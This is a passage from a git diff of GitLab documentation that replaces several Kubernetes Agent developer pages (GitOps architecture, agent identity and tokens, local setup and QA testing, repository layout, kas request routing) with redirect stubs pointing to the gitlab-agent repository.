-- Synchronize state from one or more Git repositories into a cluster. -- Configure multiple agents running in different clusters to synchronize state - from the same repository. - -## GitOps architecture - -In this architecture, the Kubernetes cluster (`agentk`) periodically fetches -configuration from (`kas`), spawning a goroutine for each configured GitOps -repository. Each goroutine makes a streaming `GetObjectsToSynchronize()` gRPC call. -`kas` accepts these requests, then checks if this agent is authorized to access -this GitLab repository. If authorized, `kas` polls Gitaly for repository updates -and sends the latest manifests to the agent. - -Before each poll, `kas` verifies with GitLab that the agent's token is still valid. -When `agentk` receives an updated manifest, it performs a synchronization using -[`gitops-engine`](https://github.com/argoproj/gitops-engine). - -If a repository is removed from the list, `agentk` stops the `GetObjectsToSynchronize()` -calls to that repository. - -```mermaid -graph TB - agentk -- fetch configuration --> kas - agentk -- fetch GitOps manifests --> kas - - subgraph "GitLab" - kas[kas] - GitLabRoR[GitLab RoR] - Gitaly[Gitaly] - kas -- poll GitOps repositories --> Gitaly - kas -- authZ for agentk --> GitLabRoR - kas -- fetch configuration --> Gitaly - end - - subgraph "Kubernetes cluster" - agentk[agentk] - end -``` - -## Architecture considered but not implemented - -As part of the implementation process, this architecture was considered, but ultimately -not implemented. - -In this architecture, `agentk` periodically fetches configuration from `kas`. For each -configured GitOps repository, it spawns a goroutine. Each goroutine then spawns a -copy of [`git-sync`](https://github.com/kubernetes/git-sync). It polls a particular -repository and invokes a corresponding webhook on `agentk` when it changes. When that -happens, `agentk` performs a synchronization using -[`gitops-engine`](https://github.com/argoproj/gitops-engine). - -For repositories no longer in the list, `agentk` stops corresponding goroutines -and `git-sync` copies, also deleting their cloned repositories from disk: - -```mermaid -graph TB - agentk -- fetch configuration --> kas - git-sync -- poll GitOps repositories --> GitLabRoR - - subgraph "GitLab" - kas[kas] - GitLabRoR[GitLab RoR] - kas -- authZ for agentk --> GitLabRoR - kas -- fetch configuration --> Gitaly[Gitaly] - end - - subgraph "Kubernetes cluster" - agentk[agentk] - git-sync[git-sync] - agentk -- control --> git-sync - git-sync -- notify about changes --> agentk - end -``` - -## Comparing implemented and non-implemented architectures - -Both architectures attempt to answer the same question: how to grant an agent -access to a non-public repository? - -In the **implemented** architecture: - -- Favorable: Fewer moving parts, as `git-sync` and `git` are not used, making this - design more reliable. -- Favorable: Uses existing connectivity and authentication mechanisms are used (gRPC + `agentk` token). -- Favorable: No polling through external infrastructure. Saves traffic and avoids - noise in access logs. - -In the **unimplemented** architecture: - -- Favorable: `agentk` uses `git-sync` to access repositories with standard protocols - (either HTTPS, or SSH and Git) with accepted authentication and authorization methods. - - - Unfavorable: The user must put credentials into a `secret`. GitLab doesn't have - a mechanism for per-repository tokens for robots. - - Unfavorable: Rotating all credentials is more work than rotating a single `agentk` token. - -- Unfavorable: A dependency on an external component (`git-sync`) that can be avoided. -- Unfavorable: More network traffic and connections than the implemented design - -### Ideas considered for the unimplemented design - -As part of the design process, these ideas were considered, and discarded: - -- Running `git-sync` and `gitops-engine` as part of `kas`. - - - Favorable: More code and infrastructure under our control for GitLab.com - - Unfavorable: Running an arbitrary number of `git-sync` processes would require - an unbounded amount of RAM and disk space. - - Unfavorable: Unclear which `kas` replica is responsible for which agent and - repository synchronization. If done as part of `agentk`, leader election can be - done using [client-go](https://pkg.go.dev/k8s.io/client-go/tools/leaderelection?tab=doc). - -- Running `git-sync` and a "`gitops-engine` driver" helper program as a separate - Kubernetes `Deployment`. - - - Favorable: Better isolation and higher resiliency. For example, if the node - with `agentk` dies, not all synchronization stops. - - Favorable: Each deployment has its own memory and disk limits. - - Favorable: Per-repository synchronization identity (distinct `ServiceAccount`) - can be implemented. - - Unfavorable: Time consuming to implement properly: - - - Each `Deployment` needs CRUD (create, update, and delete) permissions. - - Users may want to customize a `Deployment`, or add and remove satellite objects - like `PodDisruptionBudget`, `HorizontalPodAutoscaler`, and `PodSecurityPolicy`. - - Metrics, monitoring, logs for the `Deployment`. +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/identity.md b/doc/development/agent/identity.md index 83af4318de9..67084a6d995 100644 --- a/doc/development/agent/identity.md +++ b/doc/development/agent/identity.md @@ -1,106 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/identity_and_auth.md' +remove_date: '2022-06-24' --- -# Kubernetes Agent identity and authentication **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/identity_and_auth.md). -This page uses the word `agent` to describe the concept of the -GitLab Kubernetes Agent. The program that implements the concept is called `agentk`. -Read the -[architecture page](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md) -for more information. - -## Agent identity and name - -In a GitLab installation, each agent must have a unique, immutable name. This -name must be unique in the project the agent is attached to, and this name must -follow the [DNS label standard from RFC 1123](https://tools.ietf.org/html/rfc1123). -The name must: - -- Contain at most 63 characters. -- Contain only lowercase alphanumeric characters or `-`. -- Start with an alphanumeric character. -- End with an alphanumeric character. - -Kubernetes uses the -[same naming restriction](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names) -for some names. - -The regex for names is: `/\A[a-z0-9]([-a-z0-9]*[a-z0-9])?\z/`. - -## Multiple agents in a cluster - -A Kubernetes cluster may have 0 or more agents running in it. Each agent likely -has a different configuration. Some may enable features A and B, and some may -enable features B and C. This flexibility enables different groups of people to -use different features of the agent in the same cluster. - -For example, [Priyanka (Platform Engineer)](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#priyanka-platform-engineer) -may want to use cluster-wide features of the agent, while -[Sasha (Software Developer)](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#sasha-software-developer) -uses the agent that only has access to a particular namespace. - -Each agent is likely running using a -[`ServiceAccount`](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/), -a distinct Kubernetes identity, with a distinct set of permissions attached to it. -These permissions enable the agent administrator to follow the -[principle of least privilege](https://en.wikipedia.org/wiki/Principle_of_least_privilege) -and minimize the permissions each particular agent needs. - -## Kubernetes Agent authentication - -When adding a new agent, GitLab provides the user with a bearer access token. The -agent uses this token to authenticate with GitLab. This token is a random string -and does not encode any information in it, but it is secret and must -be treated with care. Store it as a `Secret` in Kubernetes. - -Each agent can have 0 or more tokens in a GitLab database. Having several valid -tokens helps you rotate tokens without needing to re-register an agent. Each token -record in the database has the following fields: - -- Agent identity it belongs to. -- Token value. Encrypted at rest. -- Creation time. -- Who created it. -- Revocation flag to mark token as revoked. -- Revocation time. -- Who revoked it. -- A text field to store any comments the administrator may want to make about the token for future self. - -Tokens can be managed by users with `maintainer` and higher level of -[permissions](../../user/permissions.md). - -Tokens are immutable, and only the following fields can be updated: - -- Revocation flag. Can only be updated to `true` once, but immutable after that. -- Revocation time. Set to the current time when revocation flag is set, but immutable after that. -- Comments field. Can be updated any number of times, including after the token has been revoked. - -The agent sends its token, along with each request, to GitLab to authenticate itself. -For each request, GitLab checks the token's validity: - -- Does the token exist in the database? -- Has the token been revoked? - -This information may be cached for some time to reduce load on the database. - -## Kubernetes Agent authorization - -GitLab provides the following information in its response for a given Agent access token: - -- Agent configuration Git repository. (The agent doesn't support per-folder authorization.) -- Agent name. - -## Create an agent - -You can create an agent by following the [user documentation](../../user/clusters/agent/index.md#create-an-agent-record-in-gitlab), or via Rails console: - -```ruby -project = ::Project.find_by_full_path("path-to/your-configuration-project") -# agent-name should be the same as specified above in the config.yaml -agent = ::Clusters::Agent.create(name: "<agent-name>", project: project) -token = ::Clusters::AgentToken.create(agent: agent) -token.token # this will print out the token you need to use on the next step -``` +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/index.md b/doc/development/agent/index.md index 112162f8f90..2cb05e2dd8f 100644 --- a/doc/development/agent/index.md +++ b/doc/development/agent/index.md @@ -1,87 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md' +remove_date: '2022-06-24' --- -# Kubernetes Agent development **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md). -This page contains developer-specific information about the GitLab Kubernetes Agent. -[End-user documentation about the GitLab Kubernetes Agent](../../user/clusters/agent/index.md) -is also available. - -The agent can help you perform tasks like these: - -- Integrate a cluster, located behind a firewall or NAT, with GitLab. To - learn more, read [issue #212810, Invert the model GitLab.com uses for Kubernetes integration by leveraging long lived reverse tunnels](https://gitlab.com/gitlab-org/gitlab/-/issues/212810). -- Access API endpoints in a cluster in real time. For an example use case, read - [issue #218220, Allow Prometheus in K8s cluster to be installed manually](https://gitlab.com/gitlab-org/gitlab/-/issues/218220#note_348729266). -- Enable real-time features by pushing information about events happening in a cluster. - For example, you could build a cluster view dashboard to visualize changes in progress - in a cluster. For more information about these efforts, read about the - [Real-Time Working Group](https://about.gitlab.com/company/team/structure/working-groups/real-time/). -- Enable a [cache of Kubernetes objects through informers](https://github.com/kubernetes/client-go/blob/ccd5becdffb7fd8006e31341baaaacd14db2dcb7/tools/cache/shared_informer.go#L34-L183), - kept up-to-date with very low latency. This cache helps you: - - - Reduce or eliminate information propagation latency by avoiding Kubernetes API calls - and polling, and only fetching data from an up-to-date cache. - - Lower the load placed on the Kubernetes API by removing polling. - - Eliminate any rate-limiting errors by removing polling. - - Simplify backend code by replacing polling code with cache access. While it's another - API call, no polling is needed. This example describes [fetching cached data synchronously from the front end](https://gitlab.com/gitlab-org/gitlab/-/issues/217792#note_348582537) instead of fetching data from the Kubernetes API. - -## Architecture of the Kubernetes Agent - -The GitLab Kubernetes Agent and the GitLab Kubernetes Agent Server use -[bidirectional streaming](https://grpc.io/docs/what-is-grpc/core-concepts/#bidirectional-streaming-rpc) -to allow the connection acceptor (the gRPC server, GitLab Kubernetes Agent Server) to -act as a client. The connection acceptor sends requests as gRPC replies. The client-server -relationship is inverted because the connection must be initiated from inside the -Kubernetes cluster to bypass any firewall or NAT the cluster may be located behind. -To learn more about this inversion, read -[issue #212810](https://gitlab.com/gitlab-org/gitlab/-/issues/212810). - -This diagram describes how GitLab (`GitLab RoR`), the GitLab Kubernetes Agent (`agentk`), and the GitLab Kubernetes Agent Server (`kas`) work together. - -```mermaid -graph TB - agentk -- gRPC bidirectional streaming --> kas - - subgraph "GitLab" - kas[kas] - GitLabRoR[GitLab RoR] -- gRPC --> kas - kas -- gRPC --> Gitaly[Gitaly] - kas -- REST API --> GitLabRoR - end - - subgraph "Kubernetes cluster" - agentk[agentk] - end -``` - -- `GitLab RoR` is the main GitLab application. It uses gRPC to talk to `kas`. -- `agentk` is the GitLab Kubernetes Agent. It keeps a connection established to a - `kas` instance, waiting for requests to process. It may also actively send information - about things happening in the cluster. -- `kas` is the GitLab Kubernetes Agent Server, and is responsible for: - - Accepting requests from `agentk`. - - [Authentication of requests](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/identity_and_auth.md) from `agentk` by querying `GitLab RoR`. - - Fetching agent's configuration from a corresponding Git repository by querying Gitaly. - - Matching incoming requests from `GitLab RoR` with existing connections from - the right `agentk`, forwarding requests to it and forwarding responses back. - - (Optional) Sending notifications through ActionCable for events received from `agentk`. - - Polling manifest repositories for [GitOps support](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/gitops.md) by communicating with Gitaly. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -To learn more about how the repository is structured, see -[GitLab Kubernetes Agent repository overview](https://www.youtube.com/watch?v=j8CyaCWroUY). - -## Guiding principles - -GitLab prefers to add logic into `kas` rather than `agentk`. `agentk` should be kept -streamlined and small to minimize the need for upgrades. On GitLab.com, `kas` is -managed by GitLab, so upgrades and features can be added without requiring you -to upgrade `agentk` in your clusters. - -`agentk` can't be viewed as a dumb reverse proxy because features are planned to be built -[on top of the cache with informers](https://github.com/kubernetes/client-go/blob/ccd5becdffb7fd8006e31341baaaacd14db2dcb7/tools/cache/shared_informer.go#L34-L183). +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/local.md b/doc/development/agent/local.md index 50959b5c450..1fff5607de4 100644 --- a/doc/development/agent/local.md +++ b/doc/development/agent/local.md @@ -1,155 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/local.md' +remove_date: '2022-06-24' --- -# Run the Kubernetes Agent locally **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/local.md). -You can run `kas` and `agentk` locally to test the [Kubernetes Agent](index.md) yourself. - -1. Create a `cfg.yaml` file from the contents of - [`config_example.yaml`](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/pkg/kascfg/config_example.yaml), or this example: - - ```yaml - agent: - listen: - network: tcp - address: 127.0.0.1:8150 - websocket: false - gitops: - poll_period: "10s" - gitlab: - address: http://localhost:3000 - authentication_secret_file: /Users/tkuah/code/ee-gdk/gitlab/.gitlab_kas_secret - ``` - -1. Create a `token.txt`. This is the token for - [the agent you created](../../user/clusters/agent/index.md#create-an-agent-record-in-gitlab). This file must not contain a newline character. You can create the file with this command: - - ```shell - echo -n "<TOKEN>" > token.txt - ``` - -1. Start the binaries with the following commands: - - ```shell - # Need GitLab to start - gdk start - # Stop GDK's version of kas - gdk stop gitlab-k8s-agent - - # Start kas - bazel run //cmd/kas -- --configuration-file="$(pwd)/cfg.yaml" - ``` - -1. In a new terminal window, run this command to start `agentk`: - - ```shell - bazel run //cmd/agentk -- --kas-address=grpc://127.0.0.1:8150 --token-file="$(pwd)/token.txt" - ``` - -You can also inspect the -[Makefile](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/Makefile) -for more targets. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -To learn more about how the repository is structured, see -[GitLab Kubernetes Agent repository overview](https://www.youtube.com/watch?v=j8CyaCWroUY). - -## Run tests locally - -You can run all tests, or a subset of tests, locally. - -- **To run all tests**: Run the command `make test`. -- **To run all test targets in the directory**: Run the command - `bazel test //internal/module/gitops/server:all`. - - You can use `*` in the command, instead of `all`, but it must be quoted to - avoid shell expansion: `bazel test '//internal/module/gitops/server:*'`. -- **To run all tests in a directory and its subdirectories**: Run the command - `bazel test //internal/module/gitops/server/...`. - -### Run specific test scenarios - -To run only a specific test scenario, you need the directory name and the target -name of the test. For example, to run the tests at -`internal/module/gitops/server/module_test.go`, the `BUILD.bazel` file that -defines the test's target name lives at `internal/module/gitops/server/BUILD.bazel`. -In the latter, the target name is defined like: - -```bazel -go_test( - name = "server_test", - size = "small", - srcs = [ - "module_test.go", -``` - -The target name is `server_test` and the directory is `internal/module/gitops/server/`. -Run the test scenario with this command: - -```shell -bazel test //internal/module/gitops/server:server_test -``` - -### Additional resources - -- Bazel documentation about [specifying targets to build](https://docs.bazel.build/versions/master/guide.html#specifying-targets-to-build). -- [The Bazel query](https://docs.bazel.build/versions/master/query.html) -- [Bazel query how to](https://docs.bazel.build/versions/master/query-how-to.html) - -## KAS QA tests - -This section describes how to run KAS tests against different GitLab environments based on the -[GitLab QA orchestrator](https://gitlab.com/gitlab-org/gitlab-qa). - -### Status - -The `kas` QA tests currently have some limitations. You can run them manually on GDK, but they don't -run automatically with the nightly jobs against the live environment. See the section below -to learn how to run them against different environments. - -### Prepare - -Before performing any of these tests, if you have a `k3s` instance running, make sure to -stop it manually before running them. Otherwise, the tests might fail with the message -`failed to remove k3s cluster`. - -You might need to specify the correct Agent image version that matches the `kas` image version. You can use the `GITLAB_AGENTK_VERSION` local environment for this. - -### Against `staging` - -1. Go to your local `qa/qa/service/cluster_provider/k3s.rb` and comment out - [this line](https://gitlab.com/gitlab-org/gitlab/-/blob/5b15540ea78298a106150c3a1d6ed26416109b9d/qa/qa/service/cluster_provider/k3s.rb#L8) and - [this line](https://gitlab.com/gitlab-org/gitlab/-/blob/5b15540ea78298a106150c3a1d6ed26416109b9d/qa/qa/service/cluster_provider/k3s.rb#L36). - We don't allow local connections on `staging` as they require an admin user. -1. Ensure you don't have an `EE_LICENSE` environment variable set as this would force an admin login. -1. Go to your GDK root folder and `cd gitlab/qa`. -1. Login with your user in staging and create a group to be used as sandbox. - Something like: `username-qa-sandbox`. -1. Create an access token for your user with the `api` permission. -1. Replace the values given below with your own and run: - - ```shell - GITLAB_SANDBOX_NAME="<THE GROUP ID YOU CREATED ON STEP 2>" \ - GITLAB_QA_ACCESS_TOKEN="<THE ACCESS TOKEN YOU CREATED ON STEP 3>" \ - GITLAB_USERNAME="<YOUR STAGING USERNAME>" \ - GITLAB_PASSWORD="<YOUR STAGING PASSWORD>" \ - bundle exec bin/qa Test::Instance::All https://staging.gitlab.com -- --tag quarantine qa/specs/features/ee/api/7_configure/kubernetes/kubernetes_agent_spec.rb - ``` - -### Against GDK - -1. Go to your `qa/qa/fixtures/kubernetes_agent/agentk-manifest.yaml.erb` and comment out [this line](https://gitlab.com/gitlab-org/gitlab/-/blob/a55b78532cfd29426cf4e5b4edda81407da9d449/qa/qa/fixtures/kubernetes_agent/agentk-manifest.yaml.erb#L27) and uncomment [this line](https://gitlab.com/gitlab-org/gitlab/-/blob/a55b78532cfd29426cf4e5b4edda81407da9d449/qa/qa/fixtures/kubernetes_agent/agentk-manifest.yaml.erb#L28). - GDK's `kas` listens on `grpc`, not on `wss`. -1. Go to the GDK's root folder and `cd gitlab/qa`. -1. On the contrary to staging, run the QA test in GDK as admin, which is the default choice. To do so, use the default sandbox group and run the command below. Make sure to adjust your credentials if necessary, otherwise, the test might fail: - - ```shell - GITLAB_USERNAME=root \ - GITLAB_PASSWORD="5iveL\!fe" \ - GITLAB_ADMIN_USERNAME=root \ - GITLAB_ADMIN_PASSWORD="5iveL\!fe" \ - bundle exec bin/qa Test::Instance::All http://gdk.test:3000 -- --tag quarantine qa/specs/features/ee/api/7_configure/kubernetes/kubernetes_agent_spec.rb - ``` +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/repository_overview.md b/doc/development/agent/repository_overview.md index b9eea286a3e..43ea99889c5 100644 --- a/doc/development/agent/repository_overview.md +++ b/doc/development/agent/repository_overview.md @@ -1,98 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/repository_overview.md' +remove_date: '2022-06-24' --- -# Kubernetes Agent repository overview **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/repository_overview.md). -This page describes the subfolders of the Kubernetes Agent repository. -[Development information](index.md) and -[end-user documentation](../../user/clusters/agent/index.md) are both available. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For a video overview, see -[GitLab Kubernetes Agent repository overview](https://www.youtube.com/watch?v=j8CyaCWroUY). - -## `build` - -Various files for the build process. - -### `build/deployment` - -A [`kpt`](https://googlecontainertools.github.io/kpt/) package that bundles some -[Kustomize](https://kustomize.io/) layers and components. Can be used as-is, or -to create a custom package to install `agentk`. - -## `cmd` - -Commands are binaries that this repository produces. They are: - -- `kas` is the GitLab Kubernetes Agent Server binary. -- `agentk` is the GitLab Kubernetes Agent binary. - -Each of these directories contain application bootstrap code for: - -- Reading configuration. -- Applying defaults to it. -- Constructing the dependency graph of objects that constitute the program. -- Running it. - -### `cmd/agentk` - -- `agentk` initialization logic. -- Implementation of the agent modules API. - -### `cmd/kas` - -- `kas` initialization logic. -- Implementation of the server modules API. - -## `examples` - -Git submodules for the example projects. - -## `internal` - -The main code of both `gitlab-kas` and `agentk`, and various supporting building blocks. - -### `internal/api` - -Structs that represent some important pieces of data. - -### `internal/gitaly` - -Items to work with [Gitaly](../../administration/gitaly/index.md). - -### `internal/gitlab` - -GitLab REST client. - -### `internal/module` - -Modules that implement server and agent-side functionality. - -### `internal/tool` - -Various building blocks. `internal/tool/testing` contains mocks and helpers -for testing. Mocks are generated with [`gomock`](https://pkg.go.dev/github.com/golang/mock). - -## `it` - -Contains scaffolding for integration tests. Unused at the moment. - -## `pkg` - -Contains exported packages. - -### `pkg/agentcfg` - -Contains protobuf definitions of the `agentk` configuration file. Used to configure -the agent through a configuration repository. - -### `pkg/kascfg` - -Contains protobuf definitions of the `gitlab-kas` configuration file. Contains an -example of that configuration file along with the test for it. The test ensures -the configuration file example is in sync with the protobuf definitions of the -file and defaults, which are applied when the file is loaded. +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/routing.md b/doc/development/agent/routing.md index 9a7d6422d47..7792d6d56a4 100644 --- a/doc/development/agent/routing.md +++ b/doc/development/agent/routing.md @@ -1,230 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kas_request_routing.md' +remove_date: '2022-06-24' --- -# Routing `kas` requests in the Kubernetes Agent **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kas_request_routing.md). -This document describes how `kas` routes requests to concrete `agentk` instances. -GitLab must talk to GitLab Kubernetes Agent Server (`kas`) to: - -- Get information about connected agents. [Read more](https://gitlab.com/gitlab-org/gitlab/-/issues/249560). -- Interact with agents. [Read more](https://gitlab.com/gitlab-org/gitlab/-/issues/230571). -- Interact with Kubernetes clusters. [Read more](https://gitlab.com/gitlab-org/gitlab/-/issues/240918). - -Each agent connects to an instance of `kas` and keeps an open connection. When -GitLab must talk to a particular agent, a `kas` instance connected to this agent must -be found, and the request routed to it. - -## System design - -For an architecture overview please see -[architecture.md](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md). - -```mermaid -flowchart LR - subgraph "Kubernetes 1" - agentk1p1["agentk 1, Pod1"] - agentk1p2["agentk 1, Pod2"] - end - - subgraph "Kubernetes 2" - agentk2p1["agentk 2, Pod1"] - end - - subgraph "Kubernetes 3" - agentk3p1["agentk 3, Pod1"] - end - - subgraph kas - kas1["kas 1"] - kas2["kas 2"] - kas3["kas 3"] - end - - GitLab["GitLab Rails"] - Redis - - GitLab -- "gRPC to any kas" --> kas - kas1 -- register connected agents --> Redis - kas2 -- register connected agents --> Redis - kas1 -- lookup agent --> Redis - - agentk1p1 -- "gRPC" --> kas1 - agentk1p2 -- "gRPC" --> kas2 - agentk2p1 -- "gRPC" --> kas1 - agentk3p1 -- "gRPC" --> kas2 -``` - -For this architecture, this diagram shows a request to `agentk 3, Pod1` for the list of pods: - -```mermaid -sequenceDiagram - GitLab->>+kas1: Get list of running<br />Pods from agentk<br />with agent_id=3 - Note right of kas1: kas1 checks for<br />agent connected with agent_id=3.<br />It does not.<br />Queries Redis - kas1->>+Redis: Get list of connected agents<br />with agent_id=3 - Redis-->-kas1: List of connected agents<br />with agent_id=3 - Note right of kas1: kas1 picks a specific agentk instance<br />to address and talks to<br />the corresponding kas instance,<br />specifying which agentk instance<br />to route the request to. - kas1->>+kas2: Get the list of running Pods<br />from agentk 3, Pod1 - kas2->>+agentk 3 Pod1: Get list of Pods - agentk 3 Pod1->>-kas2: Get list of Pods - kas2-->>-kas1: List of running Pods<br />from agentk 3, Pod1 - kas1-->>-GitLab: List of running Pods<br />from agentk with agent_id=3 -``` - -Each `kas` instance tracks the agents connected to it in Redis. For each agent, it -stores a serialized protobuf object with information about the agent. When an agent -disconnects, `kas` removes all corresponding information from Redis. For both events, -`kas` publishes a notification to a Redis [pub-sub channel](https://redis.io/topics/pubsub). - -Each agent, while logically a single entity, can have multiple replicas (multiple pods) -in a cluster. `kas` accommodates that and records per-replica (generally per-connection) -information. Each open `GetConfiguration()` streaming request is given -a unique identifier which, combined with agent ID, identifies an `agentk` instance. - -gRPC can keep multiple TCP connections open for a single target host. `agentk` only -runs one `GetConfiguration()` streaming request. `kas` uses that connection, and -doesn't see idle TCP connections because they are handled by the gRPC framework. - -Each `kas` instance provides information to Redis, so other `kas` instances can discover and access it. - -Information is stored in Redis with an [expiration time](https://redis.io/commands/expire), -to expire information for `kas` instances that become unavailable. To prevent -information from expiring too quickly, `kas` periodically updates the expiration time -for valid entries. Before terminating, `kas` cleans up the information it adds into Redis. - -When `kas` must atomically update multiple data structures in Redis, it uses -[transactions](https://redis.io/topics/transactions) to ensure data consistency. -Grouped data items must have the same expiration time. - -In addition to the existing `agentk -> kas` gRPC endpoint, `kas` exposes two new, -separate gRPC endpoints for GitLab and for `kas -> kas` requests. Each endpoint -is a separate network listener, making it easier to control network access to endpoints -and allowing separate configuration for each endpoint. - -Databases, like PostgreSQL, aren't used because the data is transient, with no need -to reliably persist it. - -### `GitLab : kas` external endpoint - -GitLab authenticates with `kas` using JWT and the same shared secret used by the -`kas -> GitLab` communication. The JWT issuer should be `gitlab` and the audience -should be `gitlab-kas`. - -When accessed through this endpoint, `kas` plays the role of request router. - -If a request from GitLab comes but no connected agent can handle it, `kas` blocks -and waits for a suitable agent to connect to it or to another `kas` instance. It -stops waiting when the client disconnects, or when some long timeout happens, such -as client timeout. `kas` is notified of new agent connections through a -[pub-sub channel](https://redis.io/topics/pubsub) to avoid frequent polling. -When a suitable agent connects, `kas` routes the request to it. - -### `kas : kas` internal endpoint - -This endpoint is an implementation detail, an internal API, and should not be used -by any other system. It's protected by JWT using a secret, shared among all `kas` -instances. No other system must have access to this secret. - -When accessed through this endpoint, `kas` uses the request itself to determine -which `agentk` to send the request to. It prevents request cycles by only following -the instructions in the request, rather than doing discovery. It's the responsibility -of the `kas` receiving the request from the _external_ endpoint to retry and re-route -requests. This method ensures a single central component for each request can determine -how a request is routed, rather than distributing the decision across several `kas` instances. - -### Reverse gRPC tunnel - -This section explains how the `agentk` -> `kas` reverse gRPC tunnel is implemented. - -<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> -For a video overview of how some of the blocks map to code, see -[GitLab Kubernetes Agent reverse gRPC tunnel architecture and code overview -](https://www.youtube.com/watch?v=9pnQF76hyZc). - -#### High level schema - -In this example, `Server side of module A` exposes its API to get the `Pod` list -on the `Public API gRPC server`. When it receives a request, it must determine -the agent ID from it, then call the proxying code which forwards the request to -a suitable `agentk` that can handle it. - -The `Agent side of module A` exposes the same API on the `Internal gRPC server`. -When it receives the request, it needs to handle it (such as retrieving and returning -the `Pod` list). - -This schema describes how reverse tunneling is handled fully transparently -for modules, so you can add new features: - -```mermaid -graph TB - subgraph kas - server-internal-grpc-server[Internal gRPC server] - server-api-grpc-server[Public API gRPC server] - server-module-a[Server side of module A] - server-module-b[Server side of module B] - end - subgraph agentk - agent-internal-grpc-server[Internal gRPC server] - agent-module-a[Agent side of module A] - agent-module-b[Agent side of module B] - end - - agent-internal-grpc-server -- request --> agent-module-a - agent-internal-grpc-server -- request --> agent-module-b - - server-module-a-. expose API on .-> server-internal-grpc-server - server-module-b-. expose API on .-> server-api-grpc-server - - server-internal-grpc-server -- proxy request --> agent-internal-grpc-server - server-api-grpc-server -- proxy request --> agent-internal-grpc-server -``` - -#### Implementation schema - -`HandleTunnelConnection()` is called with the server-side interface of the reverse -tunnel. It registers the connection and blocks, waiting for a request to proxy -through the connection. - -`HandleIncomingConnection()` is called with the server-side interface of the incoming -connection. It registers the connection and blocks, waiting for a matching tunnel -to proxy the connection through. - -After it has two connections that match, `Connection registry` starts bi-directional -data streaming: - -```mermaid -graph TB - subgraph kas - server-tunnel-module[Server tunnel module] - connection-registry[Connection registry] - server-internal-grpc-server[Internal gRPC server] - server-api-grpc-server[Public API gRPC server] - server-module-a[Server side of module A] - server-module-b[Server side of module B] - end - subgraph agentk - agent-internal-grpc-server[Internal gRPC server] - agent-tunnel-module[Agent tunnel module] - agent-module-a[Agent side of module A] - agent-module-b[Agent side of module B] - end - - server-tunnel-module -- "HandleTunnelConnection()" --> connection-registry - server-internal-grpc-server -- "HandleIncomingConnection()" --> connection-registry - server-api-grpc-server -- "HandleIncomingConnection()" --> connection-registry - server-module-a-. expose API on .-> server-internal-grpc-server - server-module-b-. expose API on .-> server-api-grpc-server - - agent-tunnel-module -- "establish tunnel, receive request" --> server-tunnel-module - agent-tunnel-module -- make request --> agent-internal-grpc-server - agent-internal-grpc-server -- request --> agent-module-a - agent-internal-grpc-server -- request --> agent-module-b -``` - -### API definitions - -- 